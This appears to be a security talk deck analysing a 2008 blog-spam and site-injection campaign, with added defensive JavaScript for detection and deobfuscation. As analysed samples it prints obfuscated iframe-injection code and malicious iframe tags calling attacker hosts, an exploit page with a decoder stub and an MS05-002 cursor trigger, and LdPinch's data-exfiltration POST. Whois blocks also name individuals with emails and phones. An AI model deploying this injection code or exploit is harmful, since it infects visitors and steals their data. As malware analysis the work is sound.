Germany, UK also investigating government PC espionage by China 

By Ken Fisher | Published: September 09, 2007 - 09:20PM CT 

In recent weeks, the Chinese have been accused not only of hacking the Pentagon, but also 
several German ministries and key sites in the UK, as well. In doing research for an 
upcoming story on the Pentagon attacks, I stumbled upon recent reports in Germany of 
surprisingly similar activity 
By Richard Spencer and Ben Quinn 
Last Updated: 1:09AM BST 06 Sep 2007 

Hackers with links to China's military were last night accused of waging a 
long-term campaign to penetrate the computer networks of British government 
departments. 


A day after China denied that it was the hidden hand behind hackers who 
breached Pentagon security networks in the US, "cyberwarriors" acting at the 
behest of the People's Liberation Army (PLA) were blamed for breaking into 
networks at the Foreign Office and other departments. 
Russia Locked In Cyberwar With Estonia 

Introduction 



Attackers are using the web in various ways to: 

- Push users to their malicious sites 
- Gain access to computers 
- Steal information 

They use many technologies: 

- Java / JavaScript 
- HTML 
- Iframes 
- Encoding / obfuscation 
- Spam injection 
For this talk we analyzed different types of attacks: 

- Blog spam 
- Web site injection 

We dissect the attacks piece by piece to analyze and show: 

- Source code 
- Commands 
- Network traffic 
- Binaries 



Attack Goals 

[Diagram slide: attackers and their goals] 



Blog Spam 



Analysis process 

- View the victim blog, locate the malicious comments 
- Trace back all A HREFs in the comments 
- wget the code from the attacker site 
  • Follow any links 
  • Decode obfuscated instructions 
  • Debug the JavaScript 
    - Firebug, Venkman 
  • Decompile Java applets 
- Look up owners of domains / IPs 
- Reverse any exploits / binaries 




Blog Spam 




1st stage of the attack 

- Uses comments on sites 
- Blogs such as Drupal and WordPress 

Comments: 

- Usually in response to a valid post 
- Splice together random but legitimate phrases from sources such as Wikipedia 
- Contain several linked words pointing to various sites 
- Are added en masse to many disparate posts 
- Often have non-English words embedded, such as Italian, German, Russian 
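The traits listed above are enough to score a comment without any network lookups. The following is an added example, not tooling from the deck: it extracts the links from a comment, measures how many anchor-text words never occur in the surrounding prose (spliced keywords), and combines that with the 32-hex-character tracking token and the link-to-host spread the deck describes. The two comments are constructed for the example (the spam one is built from the deck's own Cretaceous text and three of its link domains); the thresholds in spamScore are arbitrary starting points, not values from the deck.

```javascript
// Constructed samples: one spam comment modelled on the deck's data, one ordinary comment.
const SPAM_COMMENT = `7adaed8bf283a469f32bce1e97f13d97 The Cretaceous-Tertiary extinction event was the large-scale mass extinction of animal and plant species in a geologically short period of time, approximately 65.5 million years ago (mya). <a href="http://mir-t.ru/files/apt lombardia.htm">apt lombardia</a>, <a href="http://mebelionika.ru/download/foto zero assoluto/foto zero assoluto.htm">foto zero assoluto</a>. It is associated with a geological signature, usually a thin band dated to that time and found in various parts of the world, known as the KT boundary. <a href="http://dich.com.ua/forum/croccantino gelato.html">croccantino gelato</a>.`;
const BENIGN_COMMENT = `Great summary. Alvarez et al. 1980 is the paper that proposed the impact hypothesis; see <a href="https://en.wikipedia.org/wiki/Cretaceous%E2%80%93Paleogene_extinction_event">the Wikipedia article</a> for the current consensus.`;

// Pull out every <a href="...">text</a> pair from the comment HTML.
function extractLinks(html) {
  return [...html.matchAll(/<a\s[^>]*href=["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi)]
    .map((m) => ({ href: m[1], text: m[2].trim() }));
}

function features(html) {
  const links = extractLinks(html);
  const hosts = new Set(links.map((l) => {
    try { return new URL(l.href).host; } catch (e) { return l.href; }
  }));
  // Prose with the anchors removed, so anchor words can be compared against it.
  const plain = html.replace(/<a\s[\s\S]*?<\/a>/gi, " ").replace(/<[^>]+>/g, " ");
  const bodyWords = new Set(plain.toLowerCase().match(/[a-z]{3,}/g) || []);
  const anchorWords = links.flatMap((l) => l.text.toLowerCase().match(/[a-z]{3,}/g) || []);
  const unrelated = anchorWords.filter((w) => !bodyWords.has(w)).length;
  return {
    trackingToken: /^\s*[0-9a-f]{32}\b/i.test(html),   // leading md5-looking id
    linkCount: links.length,
    hostCount: hosts.size,
    unrelatedAnchorRatio: anchorWords.length ? unrelated / anchorWords.length : 0,
  };
}

// Weighted score; thresholds are illustrative and would be tuned on real traffic.
function spamScore(html) {
  const f = features(html);
  let score = 0;
  if (f.trackingToken) score += 2;
  if (f.linkCount >= 3) score += 1;
  if (f.hostCount >= 2) score += 1;
  if (f.unrelatedAnchorRatio >= 0.8) score += 2;    // anchor text unrelated to the prose
  return { ...f, score, isSpam: score >= 4 };
}
```

The unrelated-anchor ratio is the feature that survives the spammer changing domains or dropping the tracking token: in genuine comments the linked words are part of the sentence, in this campaign they are pasted in from a separate keyword list.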
[Screenshot: a second pair of the same spam comments ("7adaed8bf283a469f32bce1e97f13d97", Cretaceous-Tertiary extinction event; "c8932639ee4b91fa1367be834f5844c2", Hoysala Empire) on a Spanish-language Drupal site (the login prompt reads "Inicie sesion o registrese para", i.e. "Log in or register to"), spliced with a different set of Italian keywords (site www moto guzzi it, legno massello copertura, edilizia pubblica, giochi completi download, rovigo hotel albergo, capra umberto saba, blocco autocad 3d, agenzia viaggi modena, ...). Parts of the image are unreadable.] 
Cretaceous 

Submitted by drff22308 on 14 March, 2008 - 14:11. 

7adaed8bf283a469f32bce1e97f13d97 

The Cretaceous-Tertiary extinction event was the large-scale mass extinction of animal and plant species in a geologically short period of time, approximately 65.5 million years ago (mya). edilizia pubblica, armadi cabina. It is associated with a geological signature, usually a thin band dated to that time and found in various parts of the world, known as the KT boundary, eden village kournas, ing unimore it. The event marks the end of the Mesozoic Era, and the beginning of the Cenozoic Era. elenco hotel canazei, legno massello copertura. Non-avian dinosaur fossils are only found below the KT boundary and became extinct immediately before or during the event, fermentazione vino, sesso estremo gratis. Mosasaurs, plesiosaurs, pterosaurs and many species of plants and invertebrates also became extinct, trans inculata, sesso estremo gratis. Mammalian and bird clades passed through the boundary with few extinctions, albergo hotel avellino, affitti case vacanza villasimius. and radiation from those Maastrichtian clades occurred well past the boundary, testo pazza inter, pisa provincia. Many scientists theorize that the KT extinctions were caused by one or more catastrophic events such as massive asteroid impacts or increased volcanic activity, site www moto guzzi it, vendita casa prato. Several impact craters and massive volcanic activity in the Deccan traps have been dated to the approximate time of the extinction event, trasmettitore wireless video, yamaha sintoamplificatore. These geological events may have reduced sunlight and hindered photosynthesis, leading to a massive disruption in Earth's ecology, sintomo artrosi cervicale, download convertitore divx dvd. Other researchers believe the extinction was more gradual, resulting from slower changes in sea level or climate. 

Hoysala Empire 

Submitted by mer22308 on 11 March, 2008 - 12:45. 

The Hoysala Empire was a prominent South Indian empire that ruled most of the modern-day state of Karnataka between the 10th and the 14th centuries. Trucchi Narnia, piano cottura vetroceramica induzione. The capital of the Hoysalas was initially located at Belur but was later moved to Halebidu. Diario Anna Frank, Sfondi Windows Xp Gratis. The Hoysala rulers were originally hill peoples of Malnad Karnataka, an elevated region in the Western Ghats range. Donna A Pecorina, modello 740 2007. In the 12th century, taking advantage of Costo Del Metano Al Mc, Donna Bologna Annuncio Personale Amore. the warfare between the then ruling Western Chalukyas and Kalachuri kingdoms, Adunanza It, sborrate e pompino. they annexed areas of present-day Karnataka and the fertile areas north of the Kaveri River delta in present-day Tamil Nadu, testo canzone adagio lara fabian, Letti A Soppalco Per Adulti. By the 13th century, they governed most of present-day Karnataka, parts of Tamil Nadu and parts of western Andhra Pradesh in Deccan India. TVideoclip Sesso. Tabelline 
[Screenshot: search-engine results page; the entries are Russian-language pages about Daoism, Chinese culture and religion (lomonosov.org/cooperation.html, www.mylanguage.gov.au/ru/..., narakeshvara.livejournal.com, dragonest.by.ru/main/links.html, ashram.ru/archives/archives.htm, www.law.kuleuven.be/chineesrecht/webterras/godsdien1.htm). Snippets in the image are too garbled to reproduce.] 
[Screenshot: the spam landing page for the keyword "albergo hotel avellino" (hotels in Avellino), headed by the Italian proverb "Avere poco sale nella zucca" ("to have little salt in the pumpkin", i.e. to be dim-witted). The body is keyword-stuffed Italian hotel-directory text dressed up as a blog: repeated phrases such as "Hotel avellino elenco hotel avellino prenotazione hotel" (Avellino hotels, hotel list, hotel booking), "confronta i prezzi e prenota on line il tuo albergo" (compare prices and book your hotel online), fragments of listings for Hotel de la Ville (with street address, phone, fax and e-mail), Hotel Civita in Atripalda, Solofra Palace Hotel Resort, and references to saperviaggiare.it and the provincial tourist board.] 
Blog Spam 



Site made to look like normal blog 

Links don't actually work 

Page actually for deploying malware 




Blog Spam 



Attack often comes from the same domain with slightly different local parts: 

- qff09296@averfame.org 
- drff09296@averfame.org 
- drff52122@averfame.org 
- mer52122@averfame.org 

Attack domain averfame.org info: 

  Sponsoring Registrar: EstDomains, Inc. (R1345-LROR) 
  Registrant Name: Harold Lani 
  Registrant Organization: China Construction Bank 
  Registrant Street1: Mansion, No. 31 Guangji Street, Ningbo, 315000, CN 
  Registrant Email: harold@avereanoia.org 

  IP Address: 78.108.181.22 
  descr: UPL Telecom 
  changed: serge@upl.cz 20071227 
  address: UPL TELECOM s.r.o 
  address: Vinohradska 184/2396 

Blog Spam 



China Construction Bank has come up in the past in connection with malware 

- State-owned bank 
- In 2004 several executives were executed by the state for engaging in financial fraud 
- In March 2006 it was reported to be hosting phishing sites targeting US banks 




Blog Spam 



The e-mail addresses used to post the malicious comments were at averfame.org, whose whois registrant organization is given as China Construction Bank. Registrant fields are self-reported and the registrar does not verify them, so that attribution rests on whois alone. 

- The HTTP connections that made the posts came from 212.227.118.40, based on various web logs 

212.227.118.40 
  Domain: kundenserver.de 
  Address: Erbprinzenstr. 4-12 
  City: Karlsruhe 
  role: Schlund NCC 
  address: Brauerstrasse 48 
  address: Germany 

  infong113.kundenserver.de 
  Name: Achim Weiss 
  Pcode: 76133 
  Country: DE 
  address: 1&1 Internet AG 
  address: D-76135 Karlsruhe 
  e-mail: noc@oneandone.net 

kundenserver.de is 1&1's shared-hosting infrastructure, so the posting address is most likely a rented or compromised customer host rather than a machine the attacker owns. 
[Screenshot: search-engine results page, "Results 1 - 10 of about 7,400 for foto donna nude amatoriali debora (0.20 seconds)", listing among others: 
 - forum.voyages.orange.fr/liremessages.php?... 
 - www.chosto.com/?q=node/34 
 - peter.schnitzhofer.net/?q=node/1 
 - www.chronixradio.com/modules.php?name=News&file=article&...&sid=434 
 - www.progettofamiglia.com/forum/viewtopic.php?p=205238 
 - www.trisken.net/index.php?name=Forums&file=viewtopic&p=... 
 - vsartsarg.org/modules/news/article.php?storyid=29 
 - www.vaagmi.com/?q=node/15 
Several snippets show the same spliced Wikipedia text seen in the comments ("By the 13th century, they governed most of...", "a method that is still used today").] 

Most of these sites have the blog spam in comments on them. 






Blog Spam 



The URLs linked to by the first comment, listed in order, are: 

- mir-t.ru/files/rolling stones testi/rolling stones testi.htm 
- mebelionika.ru/download/site/libreria blocchi autocad/page libreria blocchi autocad.htm 
- mebelionika.ru/download/scarica gratis msn live spaces/listing/page scarica gratis msn live spaces.html 
- dich.com.ua/forum/video porno scaricare gratis/video porno scaricare gratis.htm 
- mir-t.ru/files/cavalli da salto.html 
- dich.com.ua/forum/croccantino gelato.html 
- mir-t.ru/files/apt lombardia.htm 
- mebelionika.ru/download/index sherk cartone animato.htm 
- dich.com.ua/forum/video porno com/page video porno com.htm 
- mebelionika.ru/download/foto zero assoluto/foto zero assoluto.htm 
- mir-t.ru/files/rolling stones testi/rolling stones testi.htm 
- dich.com.ua/forum/video hard casalinga gratis/video hard casalinga gratis.htm 
- mir-t.ru/files/video casalinghe gratis/video casalinghe gratis.htm 
- mebelionika.ru/download/villaggio vacanza corsica/comp/page villaggio vacanza corsica.htm 
- dich.com.ua/forum/esercizio svolti elettrotecnica/esercizio svolti elettrotecnica.htm 
- mebelionika.ru/download/falze trevignano/falze trevignano.htm 
- mir-t.ru/files/video porno con ragazzine/page video porno con ragazzine.html 
- dich.com.ua/forum/video porno com/page video porno com.htm 
- mir-t.ru/files/foto privata donna incinta nuda/style/foto privata donna incinta nuda.html 
- mebelionika.ru/download/video clitoride/index/index video clitoride.html 
The second attack contained a different set of URLs with similar content: 

- www.daolao.ru/Confucius/Pound/it/world/negozi abbigliamento ravenna/negozi abbigliamento ravenna.htm 
- www.economy-pmr.org/giic/video lesbica asiatica gratis/world/video lesbica asiatica gratis.htm 
- www.economy-pmr.org/giic/assicurazione su imbarcazioni/to/assicurazione su imbarcazioni.html 
- www.daolao.ru/Confucius/Pound/it/hotel provincia di rovigo/verso/page hotel provincia di rovigo.html 
- www.economy-pmr.org/giic/antivirus scansione online.html 
- www.daolao.ru/Confucius/Pound/it/montaggio gru edilizia.htm 
- www.economy-pmr.org/giic/world/magnolia negrita/index magnolia negrita.html 
- www.daolao.ru/Confucius/Pound/it/edilizia pubblica/index edilizia pubblica.html 
- www.economy-pmr.org/giic/antivirus scansione online.html 
- www.daolao.ru/Confucius/Pound/it/ater provincia roma/page ater provincia roma.html 
- www.economy-pmr.org/giic/incontro privati annuncio personali/top/incontro privati annuncio personali.htm 
- www.daolao.ru/Confucius/Pound/it/albergo hotel avellino/albergo hotel avellino.htm 
- www.economy-pmr.org/giic/city/cucina cinese ricetta/index cucina cinese ricetta.html 
- www.daolao.ru/Confucius/Pound/it/test colesterolo.html 
- www.economy-pmr.org/giic/news/annuncio hard sicilia/annuncio hard sicilia.htm 
- www.daolao.ru/Confucius/Pound/it/istruzioni ricarica cartuccia epson/nix/page istruzioni ricarica cartuccia epson.html 
- www.economy-pmr.org/giic/agriturismo guidonia/italia/agriturismo guidonia.html 
- www.daolao.ru/Confucius/Pound/it/lol/video sesso scaricare gratis/index video sesso scaricare gratis.htm 

There are only five different domains actually in use. 
MIR-T.RU 

  DOMAIN OWNER INFO 
    ipaddr: 89.108.95.149 
    person: Aleksandr A Artemyev 
    e-mail: sahasaha@bk.ru 
    registrar: RUCENTER-REG-RIPN 

  NETWORK OWNER INFO 
    netname: AGAVACOMPANY 
    address: AGAVA JSC 
    address: B. Novodmitrovskaya str., 36/4, 127015 Moscow, Russia 
    phone: +7 495 4081790 

DICH.COM.UA 

  DOMAIN OWNER INFO 
    ipaddr: 217.20.175.128 
    person: Oleg Teteryatnik 
    e-mail: mazai@tnmk.com 

  NETWORK OWNER INFO 
    address: WNet ISP 
    address: Pochayninska str. 25/49, off. 30, 03148, Kiev, Ukraine 
    phone: +38 067 786 96 12 
    changed: gusak@wnet.ua 20060731 

MEBELIONIKA.RU 

  DOMAIN OWNER INFO 
    ipaddr: 217.16.16.145 
    org: "Impuls-Plus" Ltd. 
    e-mail: info@mebelionika.ru 
    e-mail: mebelionika@gmail.com 

  NETWORK OWNER INFO 
    changed: caspy@masterhost.ru 20030507 
    registrar: RUCENTER-REG-RIPN 
    address: Lyalin lane 3, bld 3, 105062 Moscow, Russia 
    phone: +7 495 7729720 

DAOLAO.RU 

  DOMAIN OWNER INFO 
    ipaddr: 217.16.16.153 
    phone: +7 095 0000000 
    e-mail: yukan@tsinet.ru 

  NETWORK OWNER INFO 
    changed: caspy@masterhost.ru 20030507 
    address: Lyalin lane 3, bld 3, 105062 Moscow, Russia 
    phone: +7 495 7729720 

ECONOMY-PMR.ORG 

  DOMAIN OWNER INFO 
    ipaddr: 91.196.0.85 
    Registrant Name: Makruha Igor N. 
    Registrant Organization: Economy 
    Registrant Street1: Tiraspol, Sverdlova, MD (Moldova) 
    Registrant Phone: +373.93224 
    Registrant Email: pom@economy.idknet.com 
    Admin Name: Makruha Igor N. 

  NETWORK OWNER INFO 
    descr: HostBizUa Data Center 
    notify: msil@hostbizua.com 
    address: Polarna st. 15, 3 fw. 
    address: Ukraine, 04201 Kyiv 
    phone: +380(44) 5017659 
    e-mail: support@hostbizua.com 
    person: Valentin Dobrovolsky 
    address: Ukraine, Kyiv 

Note that mebelionika.ru and daolao.ru sit on adjacent addresses (217.16.16.145 and 217.16.16.153) at the same Moscow hosting provider; whether that is coincidence or shared infrastructure is worth checking when hunting for the rest of the campaign. 
www.economy-pmr.org belongs to the Moldovan government 

- Economic website 
- The site has been compromised by the attackers 
- Serving up spam / malware unbeknownst to the owners 

This adds yet another level of complexity 

- Yet another country, and now government involvement 
Already we can see the attack's complexity 

- 3 countries 
- Domain registered to a Chinese address, hosted in the Czech Republic, attacker posting from Germany 

Serious international and language barriers stand in the way of removing the attack 

It is easy to change one or all pieces of the attack to make blocking hard 
So what's the purpose of this type of attack? 

- Advertising $ on clicks 
- Adware/spyware installation $ 
- Information stealing 
- Botnet building 
- Raising search rankings 
- Acquiring MPack nodes 






Blog Spam - Attack Code 
Besides the fake blog HTML there is also obfuscated JavaScript 

- First there is a call to a URL decoder 
  • return decodeURIComponent(cook[1]); 
- The next section sets two variables 
- Following the variables is a section of numbers 
  • Actually decimal-encoded URLs 
- Example: 
  • On the ASCII table 104 = h, 116 = t, 112 = p, so 104, 116, 116, 112 spells "http" 
- This helps hide the URLs from people searching through the code, as well as from IDSs and automated scanners looking for JavaScript URL-redirection type traffic 
- The browser will decode and use these obfuscated URLs with no problem, but over the wire they just look like decimal numbers 
var p = (String.fromCharCode.apply(window, [104, 116, 116, 112, 58, 47, 47, 109, 
    121, 98, 101, 115, 116, 99, 111, 117, 110, 116, 101, 114, 46, 110, 101, 116, 47, 112, 
    114, 111, 103, 115, 116, 97, 116, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 
    112, 63, 85, 110, 105, 113, 67, 111, 111, 107, 61]) + 
  Counter + "&referer=" + encodeURIComponent(document.referrer) + 
  String.fromCharCode.apply(window, [38, 100, 114, 119, 61, 104, 116, 116, 112, 37, 
    51, 65, 37, 50, 70, 37, 50, 70, 119, 119, 119, 46, 100, 97, 111, 108, 97, 111, 46, 114, 
    117, 37, 50, 70, 67, 111, 110, 102, 117, 99, 105, 117, 115, 37, 50, 70, 80, 111, 117, 
    110, 100, 37, 50, 70, 105, 116])); 

The two encoded arrays decode to the following strings, so p becomes: 

- http://mybestcounter.net/progstats/index.php?UniqCook=<Counter>&referer=<document.referrer> 
- &drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2Fit 
  (URL-decoded: &drw=http://www.daolao.ru/Confucius/Pound/it, the compromised page the victim came from) 
The next section contains further obfuscation 

- It sets up an iframe in order to make the browser load the previously discussed encoded URLs 
- The iframe is 1 pixel by 1 pixel, an essentially invisible frame which the user never sees but which still gets loaded 
- The words iframe, src, marginwidth, marginheight and frameborder were broken up into multiple variables, lines and concatenated strings 
- This makes it even more difficult to detect with simple string matching 
var x = "rame"; 
var y = "i" + "f";    // this line is garbled in the source; reconstructed so that y + x === "iframe" 

NOTE how they break up the word FRAME to make it harder to detect 

var el = document.createElement(y + x); 
el.setAttribute("width", 1); 
el.setAttribute("height", 1); 
el.setAttribute("s" + "rc", p); 
el.setAttribute("marg" + "inwidth", 0); 
el.setAttribute("marg" + "inheight", 0); 
el.setAttribute("scr" + "olling", "no"); 
el.setAttribute("f" + "rameborder", "0"); 
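Both tricks on the last two slides (decimal char-code arrays and split string literals) can be undone statically, without running the script in a browser. The following is an added example and not code from the deck or the spam kit: it rewrites the script text in three passes and then reports what an analyst or a scanner would key on. SAMPLE is a constructed fragment modelled on the deck's snippet; the counter URL and the names p, x, y, el are the deck's, and Counter stands for the cookie value it concatenates.

```javascript
// Constructed script fragment modelled on the deck's obfuscated snippet.
const SAMPLE = `
var p = (String.fromCharCode.apply(window, [104,116,116,112,58,47,47,109,121,98,101,
115,116,99,111,117,110,116,101,114,46,110,101,116,47,112,114,111,103,115,116,97,116,
115,47,105,110,100,101,120,46,112,104,112,63,85,110,105,113,67,111,111,107,61]) + Counter);
var x = "rame";
var y = "i" + "f";
var el = document.createElement(y + x);
el.setAttribute("width", 1);
el.setAttribute("height", 1);
el.setAttribute("s" + "rc", p);
el.setAttribute("marg" + "inwidth", 0);
el.setAttribute("f" + "rameborder", "0");
`;

// Pass 1: String.fromCharCode.apply(<obj>, [n, n, ...])  ->  "decoded literal"
function decodeCharCodeArrays(src) {
  const re = /String\.fromCharCode\.apply\(\s*\w+\s*,\s*\[([\d\s,]+)\]\s*\)/g;
  return src.replace(re, (_, nums) => {
    const codes = nums.split(",").map((n) => n.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Pass 2: "marg" + "inwidth"  ->  "marginwidth", repeated until nothing changes
function foldStringConcat(src) {
  const re = /"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g;
  let prev;
  do {
    prev = src;
    src = src.replace(re, (_, a, b) => JSON.stringify(a + b));
  } while (src !== prev);
  return src;
}

// Pass 3: inline variables assigned exactly once to a plain string literal,
// so that  y + x  becomes  "if" + "rame"  (which pass 2 then folds).
function inlineConstStrings(src) {
  const decl = /\bvar\s+(\w+)\s*=\s*("[^"\\]*")\s*;/g;
  const seen = new Map();
  for (const m of src.matchAll(decl)) seen.set(m[1], seen.has(m[1]) ? null : m[2]);
  for (const [name, lit] of seen) {
    if (lit === null) continue;                        // reassigned: leave it alone
    src = src.replace(new RegExp(`(?<!var\\s)\\b${name}\\b`, "g"), lit);
  }
  return src;
}

function deobfuscate(src) {
  const out = foldStringConcat(decodeCharCodeArrays(src));
  return foldStringConcat(inlineConstStrings(out));
}

// What to look for once the text is readable: URLs, iframe creation, 1x1 sizing.
function indicators(src) {
  const decoded = deobfuscate(src);
  return {
    decoded,
    urls: [...decoded.matchAll(/"(https?:\/\/[^"]*)"/g)].map((m) => m[1]),
    createsIframe: /createElement\("iframe"\)/.test(decoded),
    onePixelFrame: /setAttribute\("(width|height)",\s*[01]\)/.test(decoded),
  };
}
```

The passes are deliberately text-to-text so the result can be diffed against the original and fed to the same signatures that the obfuscation was designed to evade; a real kit will also use eval, unescape and array joins, each of which needs its own pass.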
The attack chains several HTTP redirects 

<iframe WIDTH=1 HEIGHT=1 src="http://x-globstat.cc/adsview/a63?tip=user"></iframe> 
<iframe src="http://bid-assist.org/inst/index.php?id=002" width=1 height=1></iframe> 
<iframe src="http://www.climbingthewall.info/d/wm017/counter21.php" width=1 height=1></iframe> 
<iframe src=http://prolnx.info/lc1008.html width=2 height=2 style=display:none></iframe> 



[Screenshot: Tamper Data (Firefox) capture of the redirect chain ending at http://prolnx.info/lc1008.html. Requests in order, with status: 
 - http://sb.google.com/safebrowsing/update?client=navclient-auto-ffox2-0.0.5... (200; Firefox safe-browsing update, unrelated) 
 - http://mybestcounter.net/progstats/index.php?UniqCook=...&drw=http%3A%2F%2Fwww.daolao.ru%2FC... (200) 
 - (host unreadable in the capture) (301) 
 - http://updateonline.ee/proc/... (200) 
 - http://x-globstat.cc/adsview/a63?tip=user (200) 
 - http://bid-assist.org/inst/index.php?id=002 (404) 
 - http://www.climbingthewall.info/d/wm017/counter21.php (200) 
 - http://prolnx.info/lc1008.html (200) 
The header pane shows the request to www.daolao.ru (304 Not Modified): User-Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309, Cookie: Counter=1, If-Modified-Since: Thu, 13 Mar 2008 21:57:07 GMT; response Date: Sat, 15 Mar 2008 01:16:33 GMT, Server: Apache.] 

Malware 

• End goal is to deploy malware 
  - Pornocrawler.exe 
• Turns out to be LdPinch, which HTTP POSTs: 

POST /winupdate/newgate/gate.php HTTP/1.0 
Host: www.updateonline.ee 
Content-Length: 14390 

DATA: 

a=roots982@mail.ru333&b=Pinch report&d=report.bin&c=UDNNTAAAAAARIAAAEQAAA 
AAAAA .. snip AAAAAA== 

Info about the victim including: 

- installed software, hostname, domain name, internal IP address 
updateonline.ee has an IFRAME which sends the browser to prolnx.info/lc1008.html 

- Code highly obfuscated 
- Spiders off in many directions 
- Eventually deploys a rootkit 
lc1008.html source 

<html><head><title>404 Not Found</title> 
<style> 
* {CURSOR: url("anr/us1008.anr")} 
</style> 
</head> 
<body><h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache/2.2.4 (EL4) Server at www.prolnx.info Port 80</address> 
<script language="JavaScript"> 
function QfPViCa(ii){var ks="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var oo="";var c1,c2,c3;var e1,e2,e3,e4;var i=0; 
do{e1=ks.indexOf(ii.charAt(i++));e2=ks.indexOf(ii.charAt(i++));e3=ks.indexOf(ii.charAt(i++));e4=ks.indexOf(ii.charAt(i++)); 
c1=(e1<<2)|(e2>>4);c2=((e2&15)<<4)|(e3>>2);c3=((e3&3)<<6)|e4; 
oo=oo+String.fromCharCode(c1);if(e3!=64){oo=oo+String.fromCharCode(c2);}if(e4!=64){oo=oo+String.fromCharCode(c3);}}while(i<ii.length);return oo;} 

function qpYrz(a1,b1){var i;var o=""; 
if(!b1) return document.write(qpYrz(QfPViCa(a1),arguments.callee.toString().replace(/[^a-zA-Z0-9]/g,""))); 
for(i=0;i<a1.length;i++){o+=String.fromCharCode(a1.charCodeAt(i%a1.length)^b1.charCodeAt(i%b1.length));}return o;} 

qpYrz('WhQeExgMG04SHzOXRwBfC1wXD1wKGgABHEklA1wXVVBkUHAcJDg1VBQAHEx8GVEVFBhk9BhJsV3AbKBoylmMoljNLUUoPBAMPBBhSb1kQBiVUGw1TMysCFQ5fX0oFEzdgUUBR0bGURJDVACAhsGEw1UTRkVBAg9BBQbHxlhSAUXJQoWW2tHAhpBMRdSQwo1HAwTFIdvBwFcDA1SFgUEHDdBBQktXUkZOwgKDRIZDRwRWhQeAjRWKEAQABADC18PobF1gNQ1ZcUk4DEx5HS0UGVBQEARkGTQcDChADES0VBwFLXUJKejAUUjUJMyMEJ 
. . . snip . . . 
zV2DyoGFEMEUggbCEdHT3keaxFmWUoHDCEdAh1QbQ==', null); 
</script> 
lc1008.html focused on delivering multiple payloads 

- A payload providing long-term control and covert access to exploited targets 
  • Installs the agony rootkit 
  • Sets up a covert channel on the target 
- A payload providing modular control of, and access to, the target 
  • Provides dynamic extension of payloads through covert or obfuscated channels 
  • Very concerning due to its modular nature 
    - Can be easily morphed to any purpose 
    - Remains the same on the target 
The us1008.anr exploit is run from the following piece of lc1008.html: 

  <style> 
  * {CURSOR: url("anr/us1008.anr")} 
  </style> 

Because the selector is *, every element on the page gets this cursor, so the .anr file is fetched and parsed as soon as the page renders, with no click or mouse movement required. The parsing bug it targets was fixed by MS05-002 (January 2005); the kit is counting on unpatched Windows clients. 

The file anr/us1008.anr is itself a payload of type 2 (Win32.Exploit.MS05-002.Anr) 

www.prolnx.info/anr/us1008.anr has the file header RIFF....ACONanih and contains the string c:\anr1008.exe as well as urlmon.dll 
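A legitimate animated cursor is a RIFF file of form type ACON whose anih chunk carries a 36-byte ANIHEADER; the MS05-002 exploit cursors rely on USER32 trusting the chunk's declared size. The following is an added example, not the deck's tooling: a minimal RIFF/ACON walker that flags any anih chunk whose declared size is not 36 bytes, and any embedded string a cursor has no reason to carry. The two sample files are constructed in makeAni(); the strings c:\anr1008.exe and urlmon.dll are the ones the deck reports seeing in us1008.anr, and the 0x400 declared size is a made-up oversize value.

```javascript
const ANIHEADER_SIZE = 36;                       // sizeof(ANIHEADER) in a real cursor
const SUSPICIOUS_STRINGS = [".exe", "urlmon", "http://"];

// Walk the RIFF chunk list and report structural and content anomalies.
function scanAni(buf) {
  const findings = [];
  if (buf.length < 12 || buf.toString("ascii", 0, 4) !== "RIFF" ||
      buf.toString("ascii", 8, 12) !== "ACON") {
    return { isAni: false, chunks: [], findings: ["not a RIFF/ACON file"] };
  }
  const chunks = [];
  let off = 12;
  while (off + 8 <= buf.length) {
    const id = buf.toString("ascii", off, off + 4);
    const size = buf.readUInt32LE(off + 4);
    chunks.push({ id, size, off });
    if (id === "anih" && size !== ANIHEADER_SIZE) {
      findings.push(`anih chunk at ${off} declares ${size} bytes, expected ${ANIHEADER_SIZE}`);
    }
    if (id === "LIST") { off += 12; continue; }  // step into the list, past its form type
    off += 8 + size + (size & 1);                 // chunk data is word-aligned
  }
  const text = buf.toString("latin1").toLowerCase();
  for (const s of SUSPICIOUS_STRINGS) {
    if (text.includes(s)) findings.push(`embedded string "${s}"`);
  }
  return { isAni: true, chunks, findings };
}

// Builds a RIFF/ACON file (constructed test data) whose single anih chunk *claims*
// declaredSize bytes while actually carrying a 36-byte header, plus optional trailer.
function makeAni(declaredSize, trailer = Buffer.alloc(0)) {
  const anih = Buffer.alloc(8 + ANIHEADER_SIZE);
  anih.write("anih", 0, "ascii");
  anih.writeUInt32LE(declaredSize, 4);            // the chunk length USER32 trusted
  anih.writeUInt32LE(ANIHEADER_SIZE, 8);          // cbSize field inside the header
  const body = Buffer.concat([Buffer.from("ACON", "ascii"), anih, trailer]);
  const riff = Buffer.alloc(8);
  riff.write("RIFF", 0, "ascii");
  riff.writeUInt32LE(body.length, 4);
  return Buffer.concat([riff, body]);
}

const BENIGN_ANI = makeAni(ANIHEADER_SIZE);
const EXPLOIT_ANI = makeAni(0x400, Buffer.from("c:\\anr1008.exe\0urlmon.dll\0", "latin1"));
```

The walker checks every anih chunk rather than only the first: the MS05-002 fix validated the first one, and the same overflow resurfaced in 2007 (MS07-017) through a second anih chunk placed later in the file, so a check that stops at the first chunk misses that variant.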
Function qpYrz() deobfuscates the remainder of the web page and then issues: 

- "GET /?id=1008&t=other&o=0 HTTP/1.1" 
- Attempts to run the downloaded file from the user's Temporary Internet Files directory 
- If the user is an administrator, this installs the agony rootkit 

The XOR key is qpYrz()'s own source text with everything except letters and digits stripped (arguments.callee.toString().replace(/[^a-zA-Z0-9]/g, "")), so the stage only decodes when the function is run verbatim. Whitespace changes are harmless, but adding a debug statement or renaming a variable changes the key and yields garbage; to decode offline, take the function exactly as served, derive the key the same way, and XOR the base64-decoded blob with it. 
